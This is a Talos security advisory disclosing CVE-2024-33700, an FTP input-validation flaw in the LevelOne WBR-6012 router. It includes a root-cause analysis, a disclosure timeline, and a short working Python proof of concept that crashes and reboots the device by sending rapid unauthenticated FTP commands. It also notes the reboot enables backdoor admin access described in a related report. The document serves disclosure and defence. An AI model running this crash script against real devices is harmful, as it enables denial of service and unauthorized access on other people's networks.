Talos Vulnerability Report

TALOS-2024-1998

LevelOne WBR-6012 FTP improper input validation vulnerability

October 30, 2024
CVE Number

CVE-2024-33700

SUMMARY

The LevelOne WBR-6012 router firmware R0.40e6 suffers from an input validation vulnerability within its FTP functionality, enabling attackers to cause a denial of service through a series of malformed FTP commands. This can lead to device reboots and service disruption.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

LevelOne WBR-6012 R0.40e6

PRODUCT URLS

WBR-6012 - https://us.level1.com/products/wbr-6012

CVSSv3 SCORE

7.5 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE

CWE-20 - Improper Input Validation

DETAILS

The WBR-6012 is a wireless SOHO router. It is a low-cost device which functions as an internet gateway for homes and small offices while aiming to be easy to configure and operate. In addition to providing a WiFi access point, the device serves as a 4-port wired router and implements a variety of common SOHO router capabilities such as port forwarding, quality-of-service, web-based administration, a DHCP server, a basic DMZ, and UPnP capabilities.

The LevelOne WBR-6012 fails to validate user input, allowing an attacker to reboot the device by sending a series of unauthenticated FTP inputs.

The main FTP function is located at 0x800c1a44 and handles command line input for several FTP commands. However, the device does not properly handle receiving input before it has sent the output of the previous command. For example, when sending an FTP command, a normal FTP client will wait for a response from the server before sending the next message. The device accounts for this scenario: receiving a command, parsing and processing it, sending an appropriate response message, and waiting for the next command.

However, if an attacker were to send multiple messages before the device has fully completed the command-processing loop, an unknown error occurs causing the device to crash and reboot. The FTP protocol uses a return and newline to indicate the end of a command and this vulnerability can be triggered by sending any sequence of characters terminated by \r\n, including legitimate FTP commands, in quick succession. The TCP stream in such a scenaio could resemble the following:

220 FTPd 1.6
AA 
500 Bad command
AA 
AA 
500 Bad command

Note the third “AA\r\n” occurs before the response from the second. The device crashes and reboots at this point.

Early in the main FTP function (0x800c20a0) a buffer is created (0x800c1b14) to receive and process network data. Almost all of the FTP application’s logic exists within this loop.

recv_data_buffer 
800c1b14 21 28 c0 02        move       a1,s6
800c1b18 46 11 00 0c        jal        recv_data_get_buf_size undefined recv_data_get_buf_size(dword request, char * buffer, dword size)
800c1b1c bc 05 06 24        _li        a2,0x5bc

Near the end of the command-processing loop, at 0x800c2084, the output response message is moved in to the a1 register before being passed to a send message function.

800c2084 21 28 40 02        _move      a1=>s_500_Bad_command_80102560,output

The application then returns back to the start of the loop. This sequence is a likely candidate for the root cause of the crash, but without debug access to the device we can not say with absolute certainty.

Exploit Proof of Concept

The below PoC sends a series of three unathenticated FTP commands. This PoC is the simplest example but any combination and sequence of inputs can result in a crash if sent in quick succession.

import socket

host = '192.168.1.1'    # device default
port = 21

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.settimeout(1)
s.connect((host,port))
print(s.recv(1024))

for i in range(3):
    s.send(b'AAA\r\n')

print(s.recv(1024))
s.close()

The device will crash and do a “hard” reboot (allowing for backdoor admin access via TALOS-2024-1979).

TIMELINE

2024-06-03 - Vendor Disclosure
2024-08-05 - Status update request from TALOS - No reply
2024-09-03 - Status update request - Impending public release notification
2024-10-23 - Vendor notification of upcoming release date
2024-10-30 - Public Release

Credit

Discovered by Patrick DeSantis of Cisco Talos.